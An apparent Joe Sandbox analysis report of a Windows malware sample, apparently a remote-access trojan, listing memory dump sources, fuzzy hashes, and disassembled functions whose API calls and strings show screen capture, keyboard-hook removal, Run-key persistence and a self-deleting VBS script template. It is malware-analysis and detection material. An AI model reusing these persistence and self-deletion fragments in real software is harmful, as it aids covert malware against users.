                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                                                    • Instruction ID: 709358690f7fb2d2e3012b2358c769367bf3ff6314f01af24d3ecfcd65fe7181
                                                                    • Opcode Fuzzy Hash: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                                                    • Instruction Fuzzy Hash: 443290716087459BD715DE28C4807AAB7E1BF84318F044A3EF89587392D778DD8BCB8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                                                    • Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
                                                                    • Opcode Fuzzy Hash: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                                                    • Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                                                    • Instruction ID: 4a18c9c21abf6ab3d0e9afb34562907cd60dbb70f6b305f111ae620774dcdf5c
                                                                    • Opcode Fuzzy Hash: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                                                    • Instruction Fuzzy Hash: 42F18C716142559FC304DF1EE89182BB3E1FB89301B450A2EF5C2C7391DB79EA16CB9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction ID: b3ba5b81110409d95a5723b53b6c8744913893e641e186edab39e166e1bc966b
                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction Fuzzy Hash: 7DC1B1723091930ADF2D4A3D853453FFBA15AA57B171A275FE8F2CB2C1EE18C524D524
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction ID: 7f684bb0481695d58232a2b0d47c85f4cbd32b92c5f53758fc2a28b9861b6fac
                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction Fuzzy Hash: EAC1C5723092930ADF2D463D853453FFBA15AA57B171A275EE8F2CB2C5FE28C524C614
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                    • Instruction ID: b4bbf9256ac03f5d23606f900b1ff113549fac5ad7a5b3908127750d008d8003
                                                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                    • Instruction Fuzzy Hash: FDC1B0B230D1930ADB3D4A3D953453FBBA15AA63B171A275ED8F2CB2C1FE18C524D624
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: c0cc860fb011aaa8bec1e183ca1ba44e4399d72b3d9d4532b0ef978257cdf629
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 08C1A0B230D1930ADB3D463D853853FBBA15AA67B171A276ED8F2CB2C1FE18C524D614
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                                                    • Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
                                                                    • Opcode Fuzzy Hash: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                                                    • Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                                                    • Instruction ID: 9176630f27626b4b14444871c43cfb7a364794bde640040d1d9abeeee83df0d0
                                                                    • Opcode Fuzzy Hash: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                                                    • Instruction Fuzzy Hash: E1614531602709E6EF349A2B48917BF2395AB1D304F58341BED42DB3C1D55DED428A1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                                                    • Instruction ID: c8a25274eb6ace22fd939f207aba0bb726f52b15d0dfb3f1b2e2615f3a586ecc
                                                                    • Opcode Fuzzy Hash: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
                                                                    • Instruction Fuzzy Hash: B2619C71602609A6DA34496B8893BBF6394EB6D308F94341BE443DB3C1E61DEC43875E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                    • Instruction ID: b97fed3bff06dc01e1c808345b9e1576e5435f58d5e0cb17a963d6e43aa39459
                                                                    • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                    • Instruction Fuzzy Hash: C8516A21E01A4496DB38892964D67BF67A99B1E304F18390FE443CB7C2C64DED06C35E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                                                    • Instruction ID: 96b5c22f40dc969dc1399d427f9382315b517a9523814fa291cced01a0c32d8b
                                                                    • Opcode Fuzzy Hash: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                                                    • Instruction Fuzzy Hash: 5B617E72A083059FC304DF35D581A5FB7E5AFCC318F510E2EF499D6151EA35EA088B86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: 78f0f7b5b7642c22d8ee35c169576c4e0068381375f86828a5140fd971b96714
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: 9311E6BB24034143D6088A2DCCB85B7E797EADD321F7D626FF0424B758DB2AA9459608
                                                                    APIs
                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                    • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                    • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                    • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                    • GetCursorInfo.USER32(?), ref: 00418FA7
                                                                    • GetIconInfo.USER32(?,?), ref: 00418FBD
                                                                    • DeleteObject.GDI32(?), ref: 00418FEC
                                                                    • DeleteObject.GDI32(?), ref: 00418FF9
                                                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                    • DeleteDC.GDI32(?), ref: 0041917C
                                                                    • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                    • DeleteObject.GDI32(00000000), ref: 00419182
                                                                    • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                    • DeleteObject.GDI32(00000000), ref: 00419241
                                                                    • GlobalFree.KERNEL32(?), ref: 00419248
                                                                    • DeleteDC.GDI32(?), ref: 00419258
                                                                    • DeleteDC.GDI32(00000000), ref: 00419263
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                    • String ID: DISPLAY
                                                                    • API String ID: 4256916514-865373369
                                                                    • Opcode ID: 7aae0363b82f15def8c1581c033c038ec08a9654ede249bf66ec2ce172949d4b
                                                                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                                    • Opcode Fuzzy Hash: 7aae0363b82f15def8c1581c033c038ec08a9654ede249bf66ec2ce172949d4b
                                                                    • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                    APIs
                                                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                    • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                    • String ID: """, 0$")$0%s$0qF$0qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$wend$while fso.FileExists("
                                                                    • API String ID: 1861856835-653729209
                                                                    • Opcode ID: 628292546e40163a17add8b37edfdc21e90f9391df07503cdfe061d45a746786
                                                                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                    • Opcode Fuzzy Hash: 628292546e40163a17add8b37edfdc21e90f9391df07503cdfe061d45a746786
                                                                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                    APIs
                                                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                    • ExitProcess.KERNEL32 ref: 0040D419
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                    • String ID: ")$.vbs$0%s$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                    • API String ID: 3797177996-3834884813
                                                                    • Opcode ID: 924e870f8746ca6df692bd280483bcff9b55c3921b8c807954a51dcc35f95fd3
                                                                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                    • Opcode Fuzzy Hash: 924e870f8746ca6df692bd280483bcff9b55c3921b8c807954a51dcc35f95fd3
